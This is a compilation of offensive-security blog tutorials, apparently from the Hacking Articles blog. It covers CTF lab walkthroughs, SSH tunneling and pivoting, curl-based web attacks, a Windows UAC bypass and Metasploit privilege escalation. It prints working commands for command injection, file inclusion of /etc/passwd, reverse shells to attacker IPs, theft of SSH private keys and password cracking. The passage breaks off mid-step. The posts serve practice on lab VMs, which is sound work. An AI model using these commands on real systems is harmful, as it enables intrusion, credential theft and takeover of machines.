Hacking Articles|Raj Chandel's Blog

Hello friends! Previously we had discussed on Dynamic tunneling and Local tunneling and today we are going to discuss Remote tunneling.

Remote tunneling is functional when a client machine wants to access a remote system which is outward from its network.

Example: Your personal laptop (at home) is connected with your office server; currently you are working on a client system (at office) which is connected to office server. Now if you want to connect your client system with laptop in order to read some document then there should be a remote tunnel between them for communication.

Let’s Begin!!

Objective: To establish HTTP connection between remote PC and client server of different network.

Here I have set my own lab which consist three systems in following network:

SSH server (two Ethernet interface)

IP 192.168.0.116 connected to remote system 192.168.0.100

IP 192.168.10.1 connected to local network system 192.168.10.2

Ubuntu client (local network system) holds IP 192.168.10.2

Remote system (outside network) holds IP 192.168.0.100

Given image below is describing the network configuration for SSH server where it is showing two IP 192.168.0.116 and another 192.168.10.1 as explain above.

Another image given below is describing network configuration for ubuntu client which is showing IP 192.168.10.2

Another image given below is describing network configuration for Remote Desktop whose IP is 192.168.0.100

Since in this tutorial we are showing HTTP tunneling and this service is running on port 80 of Xampp server (at localhost).

From given image you can observe that the wordpress website is running on port 80.

At SSH server we have successfully browse wordpress website using URL http://192.168.0.100/index.htmland get connected with remote desktop, since they belongs to same network hence they both can access each other network for communication.

Similarly we had tried connect remote Desktop with ubuntu client through URL http://192.168.0.100/index.htmlbut get failed to browse wordpress website. Since they both belong to different network hence connection forbidden here.

Now try to establish link between remote desktop and ubuntu client using putty.

Use putty to connect SSH server (192.168.0.116) via port 22 and follow given below steps.

Then go with option SSH >Tunnel specified in the left column of category and follow given below steps:

1. Mark the check box for “Local ports accept connections from other hosts”

2. Give new port forwarded as 7000 and connection type as remote.

3. Destination address as 127.0.0.1:80 for establishing connection and then click on ADDat last

4. Click on open when all things are set.

Note: If SSH service is activated at remote desktop then replaces port 80 with port 22 which will create Remote SSH tunneling.

This will first establish the connection between remote pc and SSH server which will act like a link between remote desktop and ubuntu client throughout communication.

Now open the browser inside ubuntu client and again try to connect with remote desktop using URL http://192.168.0.116:7000/index.htmlthis will browse wordpress website which was running on localhost of remote desktop via SSH server on port 7000.

Hence we had successfully connected with remote desktop through ubuntu client.

This time we are going to solve a fun Vulnerable Lab d0not5top 1.2. To do so we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to 3mrgnc3who has hidden 7 flags inside this lab as a challenge for hackers.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.113 but you will have to find your own)

netdiscover

Next we run nmap

nmap -sV 192.168.1.113

Now, visit the IP in the Browser.

Since we didn’t found something interesting when explore its IP in browser therefore now I am going to scan the Web Content by using dirb in kali linux.

dirb http://192.168.1.113

As you can observe from above image I had highlighted a URL which indicates toward the control panel of website lets open 192.168.1.113/control in the Browser. Yes it is DNS control panel but I didn’t found any clue for 1^st flag on this web page.

After that move towards its view source page and notice FL46_1 which indicate it is the 1^stflag.

Wonderful!! Successfully found 1^st flag

From the scanning result of dirb we found so many web directories in this machine therefore further I choose 192.168.1.113/control/js Directory. In this I found a File README.MadBro.It will open as shown below.

Now here we found a Binary code which is to be converted into Decimal. On conversion you will find FL46_2:30931r42q2svdfsxk9i13ry4f2srtr98h2

Great!! Successfully get 2nd Flag.

Now, for third flag, we will use netcat very verbrose mode on port 25 which hosts smtpd service (This can befound bydoing an aggressive nmap scan onthe IP)

nc –vv 192.168.1.113 25

Here we found a Hexadecimal code which is to be converted in Text.

Great!! Successfully get 3nd Flag also.

On the url on which we found Second Flag, There is an instruction written in Leet, It reads : M4K3 5UR3 2 S3TUPYOUR /3TC/HO5TS N3XT TIM3 L0053R… 1T’5 D0Not5topMe.ctf!!! So we will go to /etc/hostsand add an entry as shown in given image.

Now open donot5topme.ctf in the browser as shownand Click on Register given at the end of web page.

As you can observe that we didn’t found any clue on this web page therefore open view source page.

At View Page Source, here we found this link as shown in highlighted text.

Some kind of encoded web page is open then I search in google related to this encoding. It is known as brain fuck encoding.

So we will decrypt it. Herewe got the FL46_4

Successfully found 4^th flag

Now move back to the d0not5topme.ctf. Now we will click on Register and Then on I agree to these terms and we will get to Registration Page.Here we click on Board Administration, which opens a prompt which asks for the client to open mailto link, here I choose Gmail.

Here I found another domain name “Megusta@G4M35.ctf”

Now let’s add G4M35.ctf into /etc/hosts as we did before and click on Save.

Before, I open this domain in browser, Here I got a game to play, although you can get the next clue by playing too, but I thought of a more technical approach and open this webpage andwith Inspect Element. Now select the Debugger Tab. Here I found game.js and inside the Game_Over script I found the next clue as “/H3X6L4m3”

Now opened the complete link “g4m35.ctf/H3X6L4m3” , it gave another new game.

Again wecan play and discover the next clue/flag. But we went to get a bit technical approach and ran a dirb command to look after its directories.

dirb http://g4m35.ctf/H3x6L64m3//usr/share/wordlists/dirb/big.txt

From given result I had highlighted http://g4m35.ctf/H3x6L64m3/textures/ for further enumeration.

Now I had open this Texture directory in the browser, here I open the skybox directory and then the dawnclouds directory and found the nz.jpg file as shown.

Now open this image and get the octal code.

When decode this code I found FL46_5

I had Captured 5th flag also!!

Now get back to the second game http://g4m35.ctf/H3x6L64m3 and open with Inspect Element. Now select the Debugger Tab. Here I found Gameplay.js and got another ctf “t3rmln4l.ctf” as shown below.

Now let’s add t3rmln4l.ctf into /etc/hostsas we did before and click on Save

Now as before, when opening this domain in browser, I got a Terminal which asks for password. After trying a bunch ofcommands, I found grep* runs on this terminal and forauthentication I entered the name of ctf as password i.et3rm1a4l.ctfand found another ctf “M36u574.ctf”.

Now let’s add M36u574.ctfalso into /etc/hostsas we did before and click on Save.

Now as before, you will openthis domain in browser, you will get a slideshow of Megusta images. Out of different images I have download the kingmegusta.jpg.

Nowwe will run exiftool on this image, here I got some code in Comment as shown below.

Now convert the code to Text and found following code as shown in image. Copy this code it is base64 encoded.

Then I had created a text file on /root/Desktop name anything you want and Paste the above decoded text in this file.

Now run John The Ripper, using this file as shown

john --wordlist=/usr/share/wordlists/rockyou.txt donotstop

Here I found a user MeGustaKingand Password ********** (10 times *).

Now using this username and password combination we will login into the ssh. Here we get a code and another username and password combination i.e. burtieo:Lets you update your FunNotes and more! But first let’s decode that highlighted code.

Copy and paste above code inside it. It is in base64 encryption, after decrypting the code we found that it is md5 encoded.

Great! It is the 6th Flag.

As mentioned above in the previous ssh login we got this username burtieo and its password is the text written above it i.e. Lets you update your FunNotes and more!

Now let’s login in ssh using combination

Username : burtieo and Password: Lets you update your FunNotes and more!

This opens rbash shell and rbash shell restricts some of the features of bash shell.

So, firstly run following command

suedoh –l

And then we run the command

suedoh /usr/bin/wmstrt

Using nmap command I found up the port 10000 open.

But this port only remains open for 20 seconds, we can make it stay open for long using “for loop”as shown.

Now let’s run metasploit and use the exploit named file_disclosure

msf> use auxiliary/admin/webmin/file_disclosure

msf> auxiliary (file_disclosure) > set lhost 192.168.1.113

msf> auxiliary (file_disclosure) > set ssl true

msf> auxiliary (file_disclosure) > set rpath /root/.ssh/id_rsa

msf> auxiliary (file_disclosure) > exploit

I found the RSA Private Key as shown.

Now Copy and Paste this Private Key in a file and name it id_rsaand then Run John The Ripper.

ssh2john id_rsa> ignite

john --wordlist:/usr/share/wordlists/rockyou.txt ignite

This has given the root password .i.e. “gustateamo”

Now I have removed permissions from id_rsa by chmod 700 and login into ssh as root with password gustateamo as shown below.

Now type following command

You can observe from given image it consist two file let open one of them

cat L45T_fl46.pl

Here it gave the message to use L45T_fl46.pl

Now use netcat command to establish connection with target through port 1234.

nc –lp 1234 –vv

Now in D0Not5top terminal we will open file L45T_fl46.pl with IP 192.168.0.7(Kali Linux IP) as given below:

./L45T_fl46.pl192.168.0.7 1234

On attacker system it will you will found get netcat connect with targeted system. The highlighted text is indicating toward FL46_7

Congratulations!! It is the 7th Flag.

Solving this lab was a fun and learning experience.

cURL is a computer software project providing a library and command-line tool for transferring data using various protocols.

CURL is simply awesome because of the following reasons...

· CURL is an easy to use command line tool to send and receive files, and it supports almost all major protocols(DICT, FILE, FTP, FTPS, GOPHER, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, POP3, POP3S, RTMP, RTSP, SCP, SFTP, SMTP, SMTPS, TELNET and TFTP) in use.

· Can be used inside your shell scripts with ease

· Supports features like pause and resume of downloads

· It has around 120 command line options for various tasks

· It runs on all major operating systems(More than 40+ Operating systems)

· Supports cookies, forms and SSL

· Both curl command line tool and libcurl library are open source, so they can be used in any of your programs

· It supports configuration files

· Multiple upload with a single command

· Progress bar, rate limiting, and download time details

· IPV6 Support

CURL comes by default installed in most of the distributions. If you do not have curl tool installed, then it’s a single apt-get (apt-get install curl) or yum (yum install curl) command.

For this tutorial we had used “web for pentester” to support curl command. As you known this lab is vulnerable against many website based attack therefore we had choose curl as our weapon for attack.

Let’s begin!!

Command Injection Exploitation

You must be aware command injection vulnerability which allows to execute OS based arbitrary command, type following command to check directory list in targeted system:

Curl “http://192.168.0.16/commandexec/example1.php?127.0.0.1;ls”

From given below image you can observe that it execute ping command as well as ls command, as result we found three PHP files in this directory.

Download File from URL

Curl is also use for download the data from any website or host machine, following command will download putty.exe file from website.

Curl -O https://the.earth.li/~sgtatham/putty/latest/putty.exe

HTTP Headers

Curl is use for identify HTTP method which helps in http verb tempering, type following command:

Curl -v -X http://www.google.com

From given below image you can perceive that only GET and HEAD methods are allowed on Google.

File Inclusion

This vulnerability allows an attacker to include a file on the web server, use following curl command to exploit it

Curl http://192.168.0.16/fileincl/example.php?page=etc/passwd

Hence you can observe that we found data from inside etc/passwd

HTTP Authentication

HTTP Authentication is use to inform the server user’s username and password so that it can authenticate that you're allowed to send the request you're sending. Curl is use HTTP Basic authentication. Now type following command which required username and password for login into website through curl.

Curl -data “uname=test&pass=test” http://testphp.vulnweb.com/userinfo.php

If you will notice given below image carefully you can observe that following code contains user information inside the table such as Email-ID, phone number, address and etc.

File Upload

Upload option inside in website allow uploading of any image or text on that particular website, for example uploading any image on facebook. Use curl command to upload the putty.exe file on targeted system.

Curl -F ‘image=@/root/Desktop/putty.exe’ http://192.168.0.16/upload/example1.php

Great! You can read the highlighted text is indicating towards directory “/upload/images/putty.exe” where file has been successfully uploaded.

Open above given directory in browser as 192.168.0.16/upload/images/

Awesome! From given below you can see putty.exe is uploaded

Analyzing TCP Headers using Wireshark

Transmission Control Protocol (TCP)

From Wikipedia

TCP is used mostly by various applications available by internet, including the World Wide Web (WWW), E-mail, File Transfer Protocol, Secure Shell, peer file, and streaming media applications.

3 Way Handshakes

The handshaking process usually takes place in order to establish rules for communication when a computer sets about communicating with a foreign device. When a computer communicates with another device like a modem, printer, or network server, it needs to handshake with it to establish a connection.

· Client sends a TCP packet to the server with the SYN flag set.

· Server responds to the client request with the SYNand ACK flags set.

· Client completes the connection by sending a packet with the ACK flag set

Structure of TCP segment

Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains 10 mandatory fields, and an optional extension field.

Source Port	The 16-bit source port number, Identifies the sending port.
Destination Port	The 16-bit destination port number.Identifies the receiving port
Sequence Number	The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1.
Acknowledgment Number	If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive.
Data Offset	The number of 32-bit words in the TCP header. It indicates where the data begins.
Reserved	Six bits reserved for future use; must be zero.
Flags	CWR, ECE, URG, ACK, PSH, RST, SYN, FIN
Window	Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field that the receiver (the sender of this segment) is willing to accept.
Checksum	The 16-bit one's complement of the one's complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero.
Urgent Pointer	Points to the first data octet following the urgent data. Only significant when the URG control bit is set.
Options	Just as in the case of IP datagram options, options can be either: – A single byte containing the option number – A variable length option in the following format
Padding	The TCP header padding is used to ensure that the TCP header ends and data begins on a 32 bit boundary. The padding is composed of zeros.

Different Types of TCP flags

TCP flags are used within TCP header as these are control bits that specify particular connection states or information about how a packet should be set. TCP flag field in a TCP segment will help us to understand the function and purpose of any packet in the connection.

List of flags	Description
CWR	Congestion Window Reduced (CWR) flag is set by the sending host to shows that it received a TCP segment with the ECE flag set
ECE	ECN-Echo indicate that the TCP peer is ECN capable during 3-way handshake
URG	Indicates that the urgent pointer field is significant in this segment.
ACK	Indicates that the acknowledgment field is significant in this segment.
PSH	Push function to transfer data
RST	Resets the connection.
SYN	Synchronizes the sequence numbers.
FIN	No more data from sender.

Analysis TCP packet using Wireshark

As you have read above “structure of TCP segment” and its “field” now we are going to elaborate it with the help of Wireshark. We hope that reader must be aware with the 7 layers of OSI model, so that TCP packet analysis will be more cleared.

From given below image you can see we had sniffed the network in order to capture TCP packets, it is clearly showing: time, source IP, destination IP, Protocol, length of packets and information.

As I had told above if you are aware of OSI model then you can see it has shown three layers of OSI: layer 2 (Ethernet), layer 3 (Internet Protocol version 4), layer 4 (Transmission Control Protocol (TCP)).

Now let’s analysis layer 4 and compare above theory with given below image. You can see I have underline all fields of TCP segment. Now read following information of TCP packets.

Source Port: 58302

Destination Port: 80

Sequence number: 0

Acknowledgment number: 0

Flags: SYN

Window size value: 29200

Checksum: unverified

Urgent Pointer: 0

Option: 20 bytes

The SYN (synchronize) flag is the TCP packet flag which is set to start a TCP connection for “3 way handshakes” and the Sequence number and Acknowledgment number are 0 .

From given below image you can see expanded field for flags is showing only 1flag SYN is set between source port and Destination port rest flags are not set at this moment. Hence the control bitswill get 1 for that sets flag in TCP connection otherwise it remains zero.

Packets setting the SYN flag can also be used to perform a SYN flood and a SYN scan.

As I had explain above in three way handshakes first client request with SYN flag after that Server responds to the client request with the SYN and ACK flags set, and from following information we observe same sequence of packet transferring between client and server and as well as the Sequence number is 0& Acknowledgment number is 1.

Source Port: 58302

Destination Port: 80

Sequence number: 0

Acknowledgment number: 1

Flags: SYN, ACK

Window size value: 42408

Checksum: unverified

Urgent Pointer: 0

Option: 12bytes

From expanded field of flags you can observe that this time 2 flags SYN and ACK are set rest are remain unset or say zero and control bit is set 1-1 for both flag. This is the 2^nd step for “3 way handshake”

From following information we found this time the Sequence number & Acknowledgment number are 1 and Client completes the connection by sending a packet with the ACK flag set. Now TCP connection has be established between client and server.

Source Port: 58302

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Option: 12bytes

From given below image you can observer that the control bit is 1 for acknowledgement flag and this is the third step required for “3 way handshake” between source port and destination port.

Once TCP 3 ways handshake connection established then data can transfer between client and server as you can see from last image it has shown 7^th layer for Hypertext Transfer Protocol also for data transferring.

Source Port: 58302

Destination Port: 80

Sequence number: 1

Acknowledgment number: 1

Flags: PUSH, ACK

Window size value: 229

Checksum: unverified

Urgent Pointer: 0

Option: 12bytes

The use of push function and the PUSH flagis to move forward the data from the sending user to the receiving user. In order to permit applications to read from and write to this socket at any time, buffers are implemented on both sides of a TCP connection.

Here you can observe that control bit set to 1for PUSH and ACK flag as a result a new layer get open for data transferring between sender application and receiver application.

Now when transfer data packet explored we found http header details like:

Host: google.com

User-Agent: Mozilla/5.0

At last the different types of cookie that you can observe in given below image.

Today we are going to solve a fun Vulnerable Lab DonkeyDocker,download this VM Machine from here.

The credit for developing this VM machine is goes to Dennis Herrmann who has hide 3 flag inside this lab as a challenge for hackers.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.120 but you will have to find your own)

Netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.120

As you can see port 22 for ssh and 80 for http are open, so let’s explore port 80 through Browser.

After browsing I found three tabs Home, About and Contact but didn’t found any clue for next step, then I decided to scan the target directory using dirb scan.

Now open the terminal in kali Linux and type following command:

dirb http://192.168.1.120

From scanning result I choose the highlighted directory http://192.168.1.120/mailer/examples/ for further enumeration.

Here, we get to know that PHPMailer is running on targeted system. Let try to find out its version.

So After browsing a bit about PHP Mailer, we came know that how to get the version of phpmailer

http://192.168.1.120/mailer/VERSION

We got the version of PHPMailer i.e. 5.2.16.

From Google we came to known that PHPMailer 5.2.16 is vulnerable to Remote Code Execution (python) {CVE-2016-10033}. Exploiting PHPMail with back connection (reverse shell) from the target. You can download this exploit from here.

After Downloading the Python File and make following changes:

1. Open the file and add “# coding: utf-8” at the beginning.

2. Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.

3. Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code

4. After making above changes save it.After Downloading the Python File and make following changes:

1. Open the file and add “# coding: utf-8” at the beginning.

2. Set target = ‘http://192.168.1.20/contact’ (victim IP), it is the location where backdoor.php get uploaded in victim’s machine automatically.

3. Give attacker IP : 192.168.1.101(kali Linux IP) inside payload code

4. After making above changes save it.

Now start natcat at port same port on which the payload is bind i.e. 4444 for establishing reverse connection with target.

nc –lvp 4444

Before you run the python script, type following command in a new terminal which will install the exploit dependency.

Pip2 install requests_toolbelt

Now run the script in order to exploit the target as shown in given image.

python 40974.py

Move back natcat shell and here you will find that it is connected to victim but not able to access proper shell of victim system therefore type given command in order to access victim shell properly as shown in image.

python -c 'import pty; pty.spawn("/bin/bash")'

Once you got the victim shell type following commands for finding hidden flag.

Cat main.sh

Here we found user smith which is a directory has flag.txtlet approach toward this directory.

Cd home

While again opening smith directory, we got Permission denied.

Then we used su smith to instead of sudo, because sudo is not accessible in this shell

Su smith

For Password we tried “smith” and successfully get smith’s shell

Now we are inside smith shell, type following command to get the flag

Cd /home/smith

Flag.txt

Cat flag.xt

Grate!! Successfully capture 1^st flag

Moreover if you notice the given image you will find next clue “I like 1984 written by Geoge ORWELL” it could be possible that it might be a user name having 2^nd flag inside it.

Type following command to view all directory list

Ls-al

We got the authorized keys,id_ed25519 and id_ed25519.pub in SSH directory, lets open these key one by one

Cat authorized_keys

Cat id_ed25519

Cat id_ed25519.pub

In id_ed25519 we get the Openssh Private Key and this key is authorized for orwell@donkeydocker. Now copy the private key and past inside the text file.

We have Save this Private Key in a file as id_rsa as shown in given below image.

Now using ssh login by

Ssh –I id_rsaorwell@192.168.1.120

Here you will be greeted by the Donkey Docker Shell. Now check directory list for 2^nd flag

Flag.txt

Cat flag.xt

Nice!! Successfully got 2^nd shell

Now for the last flag we tried and a lot of different tricks but nothing seems to get through and you can read an article from here, which help in finding the 3^rdflag.

Type following command

docker run –v /root:/hack –t debian:jessie /bin/sh -c ‘ls -al /hack’

This created a user named Jessie and gave it root access through privilege escalation; check all directory lists inside it, here we get the flag.txt file.

Now to open this file we will use the previous command just with slight modification as shown:

docker run -v /root:/hack -t debian:jessie /bin/sh -c ‘cat /hack/flag.txt’

Awesome we got 3^rdflag also.

In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

Attacker: Kali Linux

Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid

getprivs

From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.

To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.

Copy the entire content of “bypass_comhijack” from hereand past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

Use exploit/windows/local/bypassuac_comhijack

Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp

Msf exploit (bypassuac_comhijack) > set session 2

Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20

Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem

getprivs

Wonderful!! Attacker got system/admin authorities and privileges.

Today I found a Vulnerable Lab based on the world of Lords of The Rings. So get on your Gandalf mode to solve this fun Vulnerable Lab Moria 1.2., we are going to download the VM Machine from here.

The credit for developing this VM machine is goes to Abatchy. It is a Boot2Root Lab.

Note: According to author you don’t need LOTR knowledge to hack this VM, but trust me, you need it.

Let’s Breach!!!

As always, Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.125 but you will have to find your own)

netdiscover

Use nmap command for port enumeration

nmap -sV 192.168.1.125

As you can see port 21 for ftp, port 22 for ssh and port 80 for http are open, so let’s explore port 80 through Browser.

After Browsing I found this Image with label Gates of Moria. I decided to do a bit research on the text written in given below the image. After searching through some wiki pages, I found its translation “Say Friend and Enter” where Mellon means Friend.

So Friend or Mellon must be a password. Keeping that in mind let’s move forward. Here I decided to scan the target directory using dirb scan. Now open the terminal in Kali Linux and type the following command:

dirb http://192.168.1.125/

From scanning result I choose the highlighted directory for further enumeration.

http://192.168.1.125/w/

So I opened this directory in the Browser and found another directory inside it i.e h/

On opening it I got another directory and so on until it completes path /w/h/i/s/p/e/r. Here we find the last directory named the_abyss/ .

On opening the_abyss, I got some text as shown in image. Fundin:”That human will never save us!”

Tried to look at source code but nothing then again try to refresh the page and then found this above given text get changed into another the text, again refresh the page again text change into “Knock Knock”.

Firstly seemed weird but then I refreshed again and it changed again hence text were changing randomly when I refresh the web page.

So I decided to do a dirb scan but it gave no result, so I did an extension dirb scan as shown.

dirb http://192.168.1.125/w/h/i/s/p/e/r/the_abyss/ -X .txt .img .html

This dirb scanner scans for a particular extenstion which is specified like .txt or .img etc.

Aha! Found a file named random.txt.

So I opened it through the browser and found all the text that was coming on refreshing page in a single webpage as shown.

This text contains a lot of names like Balin, Oin, Ori, Fundin, Nain, Eru, Balrog, I noted them because they might be usernames or passwords.

Now I tried to connect with ftp port.

ftp 192.168.1.125

It greeted with Welcome Balrog

And I knew it must be the username because it was in the random.txt too but for password, I had tried multiple names which I found previously and then I remembered the text form the image, “Say friend and enter”. I entered Friend but login failed then tried with Mellow and got login successfully.

Therefore for FTP Login give following credential:

Username: Balrog

Password: Mellow

NOTE: - If you get an error, restart VM and also try multiple times with the above username and password.

After login, I tried pwd command and got the path to be /prision. I looked around it in hope of a flag but didn’t found any hint for flag. Then I found var folder and move inside inside.

Then I got to /var/www/html here I found this folder QlVraKW4fbIkXau9zkAPNGzviT3UKntl

When opened it in browser I found a table having two columns for Prisoner’s name and Passkeyas shown in given image.

As always, I searched the source code for some hint. From View Source page I found the “salt” which can be used to decrypt the MD5 Password.

After trying different kinds of formats to decrypt above MD5 password I created a file with name and passkey and salt in this format

Prisoner’s Name:Passkey$Salt

Name it whatever you want (Here I named it passwords and saved it on my kali Desktop).

Now we will run John The Ripper, Dynamic -6 on this file to decrypt it. By using this command in my kali terminal

john–form=dynamic_6 /root/Desktop/lol

These look like login credentials.

After trying all user credentials decrypted to login in ssh, I got success with

SSH Login

Username :Ori

Password :spanky

Now login into ssh using above credential

ssh Ori@192.168.1.125

Here we got the bash shell. Now I tried multiple commands in search of a flag in ls-al, I found a poem.txt file, which contains a poem. But it didn’t find any flag inside it.

Then I looked into.ssh/ directory And found know_hosts file, and id_rsa file which contained the private key and then open these file one by one,

Cat id_rsa

Copy the entire text found inside id_rsa in a text file and save as id_rsa.

Now open another file known_host with cat command, here you will find host is “127.0.0.1”, let use these information for ssh login for root user.

Ssh -i id_rsa root@127.0.0.1

I got the ROOT.

But let’s finish it properly. So I tried ls -la scan to get a flag. And I found a flag.txt inside flag.txt I got the Final Message “All that is gold does not glitter”.

It was an adventurous and learning experience and I would like to thank Abatchy for creating such a fun VM Lab

If you are aware of SSH tunneling then you can easily understand SSH pivoting, if not then don’t worry read SSH tunneling from here.

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack

This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.0.109

msf auxiliary(ssh_login) > set username raj

msf auxiliary(ssh_login) > set password 123

msf auxiliary(ssh_login) > exploit

From given image you we can observe that command shell session 1opened

Now convert command shell into meterpreter shell through following command

Session –u 1

From given image you can observe that Meterpreter session 2 opened

Sessions

Hence if you will count then currently attacker has hold 2 sessions, 1^st for command shell and 2^ndfor meterpreter shell of SSH server.

Check network interface using ifconfig command

From given image you can observe two network interface in victim’s system 1^stfor IP 192.168.0.109 through which attacker is connected and 2^nd for IP 192.168.10.1through which SSH client (targets) is connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.10.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.10.0 network attacker need run the post exploitation“autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to 'pivot' through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute

msf post(autoroute) > set subnet 192.168.10.0

msf post(autoroute) > set session 2

msf post(autoroute) > exploit

This time we are exploiting SSH ignite (local client) therefore we are going to use same module for it that had used above for SSH raj, only need to change information inside exploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.10.2

msf auxiliary(ssh_login) > set username ignite

msf auxiliary(ssh_login) > set password 1234

msf auxiliary(ssh_login) > exploit

From given image you can see another command shell 3opened, if you will count then total attack has hold 3 sessions, two for SSH server and one for SSH client.

Sessions

1. Command shell for SSH raj (192.168.0.109:22)

2. Meterpreter shell for SSH raj (192.168.0.109)

3. Command shell for SSH ignite (192.168.10.2:22)

Sessions 3

Now attacker is command shell of SSH ignite (client), let’s verify through network configuration.

Ifconfig

From given you can observe the network IP is 192.168.10.2

Pivoting is Dangerous but enjoyable network attack J

Hello friends! Today we are going to take another CTF channeling known as Analougepond which Based on our previous article “SSH pivoting”, if you are aware of ssh pivoting then you can easily breach this vm machine.

The credit for making this vm machine goes to “Knightmare” and it is another boot to root machine where author has hide flag for attacker as the new challenge.

Lets Breach!!!

The target holds 192.168.0.108 as network IP; now using nmap lets find out open ports.

nmap -sT -sU 192.168.0.108

From give image you can check port 22 for SSH, 68 for DHCP and 161 for SNMP are open in target network.

Now let’s enumerate for SNMP enumeration using metasploit

This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is "public"

use auxiliary/scanner/snmp/snmp_enum

msf auxiliary(snmp_enum) > set rhosts 192.168.0.108

msf auxiliary(snmp_enum) > set threads 5

msf auxiliary(snmp_enum) > exploit

From given image you can read system information, like host IP, hostname, description and etc. you will notice that here I had highlighted contact which contain a name Eric Burdon and location which contains some text “there is a hose in New Orleans they call it………”

Here eric could be a hint for username, now let ask from Google for “there is a hose in New Orleans they call it………”

So when I search for given text in Google, I found that these texts are the lyric of a poem “The House of Rising Sun”. It might be possible that the author knightmare wants to give some password clue through this poem. From given image you can read the highlighted text “the Rising Sun” which could be the password for SSH.

Now let’s enumerate for SSH login using metasploit

Use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhost 192.168.0.108

msf auxiliary(ssh_login) > set username eric

msf auxiliary(ssh_login) > set password therisingsun

msf auxiliary(ssh_login) >exploit

As result we had successfully login and obtained command shell session 1of targeted system, more found install version of ubuntu i.e. 14.04.1

If you will search in Google you will come to know that ubuntu 14.04.1 is exploitable to overlayfs privilege escalation.

This module attempts to exploit two different CVEs related to overlayfs. CVE-2015-1328: Ubuntu specific -> 3.13.0-24 (14.04 default) < 3.13.0-55 3.16.0-25 (14.10 default) < 3.16.0-41 3.19.0-18 (15.04 default) < 3.19.0-21 CVE-2015-8660: Ubuntu: 3.19.0-18 < 3.19.0-43 4.2.0-18 < 4.2.0-23 (14.04.1, 15.10) Fedora: < 4.2.8 (vulnerable, un-tested) Red Hat: < 3.10.0-327 (rhel 6, vulnerable, un-tested)

use exploit/linux/local/overlayfs_priv_esc

msf exploit(overlayfs_priv_esc) > set lhost 192.168.1.105

msf exploit(overlayfs_priv_esc) > set session 1

msf exploit(overlayfs_priv_esc) > exploit -j

This times also we had successfully got command shell session 2 opened of target system.

Now convert command shell (for session 2) into meterpreter shell using following command

Sessions -u 2

This will a new session which session 3 for meterpreter shell

Meterpreter> ls

Meterpreter> cat flag.txt

We have Captured 1^stflag successfully!!

When as check network interface configuration in target system I found a new IP 192.168.122.1 on its 3^rd interface as shown in given image.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute

msf post(autoroute) > set subnet 192.168.122.1

msf post(autoroute) > set session 3

msf post(autoroute) > exploit

Meterpreter > arp

Here you can check all IP and MAC address, 192.168.122.2 will be another target.

Enumerate open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhost 192.168.122.2

msf auxiliary(tcp) > set 1-500

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) > exploit

From result we found port 22 is open which used for SSH.

Move inside into meterperer shell then type following command for port forwarding of port 22 into port 8000 as shown below:

